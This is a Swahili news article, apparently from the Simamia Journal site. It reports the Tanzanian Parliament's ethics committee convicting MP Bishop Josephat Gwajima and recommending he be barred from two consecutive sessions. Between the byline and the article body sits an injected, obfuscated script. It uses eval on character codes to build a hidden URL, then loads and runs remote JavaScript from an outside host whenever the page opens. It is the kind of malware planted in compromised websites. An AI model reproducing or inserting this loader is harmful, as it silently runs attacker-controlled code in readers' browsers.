Recent Comments

GWAJIMA NA SLAA WAPEWA ADHABU-BUNGENI

By Simamia Journal Aug 31, 2021
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Kamati ya Bunge ya Haki, Maadili na Madaraka ya Bunge imetoa Ripoti yake leo Bungeni Dodoma kuhusu shauri la Mbunge wa jimbo la Kawe Askofu Josephat Gwajima baada ya kumaliza kumhoji kwa tuhuma za kuzungumza uongo na kulishushia hadhi Bunge la Jamhuri ya Muungano wa Tanzania
Akisoma Taarifa hiyo Bungeni, Mwenyekiti wa Kamati hiyo Emmanuel Mwakasaka  ameelez kuwa:-
 Shahidi alikiri kauli zote ni zake 100% na akasema ni mahubiri ———>
” _niliyasema nikiwa Kanisani na ninayasema kama Askofu, kosa kubwa ni kujaribu kuyakosoa mahubiri, huwezi ku-question mahubiri, Kamati ilijiridhisha kuwa mahubiri yanayotolewa yanapaswa kuzingatia Sheria za Nchi hivyo kauli zinazotolewa haziwezi kuwa na kinga ya kuhojiwa”_
“Gwajima ni Mbunge na Kiongozi kwa hiyo anatakiwa kuwa mfano wa kuigwa. Tuhuma za kuchonganisha Mhimili wa Bunge na Serikali au Serikali na Wananchi zinajidhihirisha wazi kwenye kauli za Askofu Gwajima”
“Gwajima alishindwa kuthibitisha kauli zake na hana kielelezo chochote kama alivyowaaminisha Wananchi, suala la Viongozi kupewa rushwa hakutoa ushahidi wowote. Kamati imemtia hatiani Askofu Gwajima”
“Kuhusu adhabu ya utovu wa nidhamu uliokithiri wa Askofu Gwajima ni kuwa kanuni zinataka *asihudhurie mfululizo mikutano miwili au isiyopungua mitatu* , Kamati ilishangazwa na vitendo alivyovifanya mbele yake na iliona ni dharau”
“Askofu Gwajima hakukiri wala kujutia makosa yake, alionyesha dharau hivyo Kamati imemtia hatiani, Bunge linaazimia kuwa apewe adhabu ya kutohudhuria mikutano miwili mfululizo ya Bunge baada ya kupitisha azimio hili” ——— asema Mwenyekiti wa Kamati ya Bunge ya Maadili *Emmanuel Mwakasaka.*
Endelea kufuatilia habari mbalimbali,tunakaribisha pia maoni yako kuhusu habari na matangazo ya #Simamia TV
www.simamia.com
0756432748
Whatsapp +255756432748

By Simamia Journal

Tangaza nasi. www.simamia.com YouTube Chanel: www.youtube.com/c/SimamiaTv